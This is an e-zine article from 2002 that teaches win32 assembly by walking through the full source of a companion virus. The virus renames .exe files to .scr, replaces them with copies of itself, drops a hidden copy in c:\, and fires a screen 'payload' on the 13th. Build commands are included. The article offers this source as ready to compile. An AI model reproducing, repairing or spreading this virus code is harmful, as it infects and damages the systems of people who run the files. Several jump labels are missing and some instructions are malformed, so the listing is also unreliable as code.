The Revoluti0n
last article table of contents next article

Strange Article - Starting with win32asm by NeKr0

   Hi, this is my old article, translated from the russian e-zine "Habitat".
In this article I'll show how to easy write in win32asm. Forget your HLL and
use power of pure asm (hi philie ;) .
   This companion virus is written in tasm syntaxis. It works in current
folder: searches *.exe files, renames it to *.scr and writes itself to
found file name, makes hidden dropper in c:\ . Checks date and if day=13
shows graphical payload (bloody fog).
   When you code in win32asm you must declare all API that your program uses.
Like this:
;====================== tasm directives
.386                    ;
.model flat             ;flat memory model (wind0ze works in this model)
;====================== API list
	extrn FindFirstFileA:proc
	extrn FindNextFileA:proc
	extrn SetFileAttributesA:proc
	extrn MoveFileA:proc
	extrn CopyFileA:proc
	extrn GetCommandLineA:proc
	extrn CreateProcessA:proc
	extrn lstrcpyA:proc
	extrn ExitProcess:proc
	extrn CreateFileA:proc
	extrn CloseHandle:proc
	extrn MessageBoxA:proc
	extrn GetDC:proc
	extrn SetPixel:proc
	extrn GetSystemMetrics:proc
	extrn ExitProcess:proc
	extrn GetSystemTime:proc
	extrn MessageBoxA:proc
;====================== end of API list 
Next. We need a place to store our values. Better way - store it in data
;====================== data segment
.data               		        ; declaration segment of data
Tdate:                                  ;Place for date/time values
Tyear           dw 0                    
Tmonth          dw 0                    
Tdow            dw 0                    
Tday            dw 0                    
Thour           dw 0                    
Tmin            dw 0                    
Tsec            dw 0                    
Tmilsec         dw 0                    
xcoord          dd 0                    ;There be width of screen
ycoord          dd 0                    ; ------ height of screen
newx            dd 0                    ;Coords for dots
newy            dd 0                    ;
dc              dd 0                    ;Handle of screen
exe             db '*.EXE',0            ;mask for searching
FHandle         dd 0                    ;file handle
processinf 	dd 4 dup (0) 		; PROCESS_INFORMATION
startupinf 	dd 4 dup (0) 		; STARTUPINFO
SearchRec       db 44 dup (0)           ;There is region for searh data-|
FileName        db 274 dup (0)          ;file name in search data      -|
NewName         db 260 dup (0)          ;array for new file name
MyName          db 260 dup (0)          ;array for virus name
filehandle 	dd 0 			;file handle
drp             db 'c:\w32worm.exe',0   ;path & file name for dropper
CopyLeft        db ' [Win32.Companion by NeKr0!] ',0 ; copyleft
txt             db '!! Vivat Egor Letov !!',0 ; My favorit singer 
;====================== end of data segment
Yeah. Time to write code.
;====================== code segment
.code     			        ;declaration code segment
        call GetCommandLineA            ;Get command line
        push eax                        ;pointer to command line
        push offset MyName              ;pointer to array for vius name
        call lstrcpyA                   ;copy
        mov edi,eax                     ;pointer to virus name
        cmp byte ptr [edi], '.'         ;compare char
        jz found_dot                    ;if char='.' then go out
        inc edi                         ;add edi 1
        jmp search                      ;search again
        mov esi,edi                     ;store pointer to dot in esi
        inc esi                         ;add esi 1
	add edi,4
        mov byte ptr [edi],00           ;write 0 after file name
infect:                                 ;
        push offset SearchRec           ;see data segment
        push offset exe                 ;mask for search
        call FindFirstFileA             ;search
        mov dword ptr [FHandle],eax     ;search handle
        cmp eax,-1                      ;check for errors
        je Drop                         ;like a '*.exe not found'
        or eax,eax                      ;
        jz Drop                         ;if error - make dropper

infect_file:                            ;
        push offset FileName            ;
        push offset NewName             ;
        call lstrcpyA                   ;copy name of found file in our array
        mov edi,eax                     ;pointer to copied file name
        cmp byte ptr [edi],'.'          ;search dot in file name
        jz found_dot2                   ;
        inc edi                         ;
        jmp search_2                    ;
        inc edi                         ;
        mov dword ptr [edi],'rcs'       ;change extention to SCR
        mov byte ptr [edi+3],0          ;add 0 after file name
        push offset NewName             ;
        push offset FileName            ;
        call MoveFileA                  ;rename exe to scr
        or eax,eax                      ;check errors
        jz Next                         ;if error - find next file

        push 1                          ;
        push offset FileName            ;
        push offset MyName+1            ;Why MyName+1? Coz in wind0ze when
                                        ;you run file, it runs as "file.exe"
                                        ;and MyName="file.exe
                                        ;add 1 and MyName=file.exe
        call CopyFileA                  ;Copy our body with found file name
        push offset SearchRec           ;
        push dword ptr [FHandle]        ;
        call FindNextFileA              ;Search next file
        jmp check_exe                   ;

drop:                                   ;Make dropper
        push 0                          ;
        push offset drp                 ;
        push offset MyName+1            ;
        call CopyFileA                  ;Copy our body to c:\
        push 00000001h OR 00000002h     ;
        lea  eax,drp                    ;
        push eax                        ;
        call SetFileAttributesA         ;Set attributes: hidden

runz:                                   ;
        push offset Tdate               ;Check date
	call GetSystemTime		
        cmp Tday,13                     ; Doom day?
        je payload                      ; Yeah!!!
        push offset processinf          ;In other days run host program
        push offset startupinf          ;
        sub eax,eax                     ;
        push eax                        ;
	push eax 			;
	push 10h 			;
	push eax 			;
	push eax			;
	push eax			;
        call GetCommandLineA            ;
        inc eax                         ;
        push eax                        ;
        mov dword ptr [esi],'rcs'       ;esi still point to name of executed file
                                        ;change extention of it file
        push offset MyName+1            ;
        call CreateProcessA             ;and run it
        push 0                          ;
        call ExitProcess                ;Go out here

payload:                                ;Kinda payload :)
	push 0
	push offset CopyLeft
	push offset txt
	push 0
        call MessageBoxA                ;Horror MessageBox
        xor eax,eax                     ;
	push eax
	call GetDC
        mov dword ptr dc,eax            ;Bllody fog there
        push 16                         ;Learn asm if you are interested
        call GetSystemMetrics           ;what it does :p
	mov dword ptr xcoord,eax
	push 17
        call GetSystemMetrics           ;
	mov dword ptr ycoord,eax
        mov eax,dword ptr xcoord        ;
	push eax
	call random
	mov dword ptr newx,eax
        mov eax,dword ptr ycoord        ;
	push eax
	call random
	mov 4 ptr newy,eax
        push 200                        ;
        push newy                       ;
        push newx                       ;
        push dc                         ;
        call SetPixel                   ;
        jmp next_pix                    ;

random  proc                            ;Random procedure
                                        ;where did i steal it? i forgot :)
        push edx                        ;
a2a:    db 0fh, 31h                     ;
        xor edx, edx                    ;
        div dword ptr [esp+8]           ;
        in al,40h                       ;
        add dl,al                       ;
        xchg eax, edx                   ;
r_out:  pop edx                         ;
        ret 4                           ;
random  endp          
end worm                		;Kinda end of virus
                     		        ;yeah! you have a simple windows wirus!!!
;================ end of code
To compile this use batch file:
======================================= make.bat
tasm32.exe /mx /m3 worm.asm,,;
tlink32.exe /Tpe /aa /c /v worm.obj,,, import32.lib,

P.S.: sorry for my english :)

(c) 2002 NeKr0! (from Habitat e-zine)

living virus

"ready-to-compile" files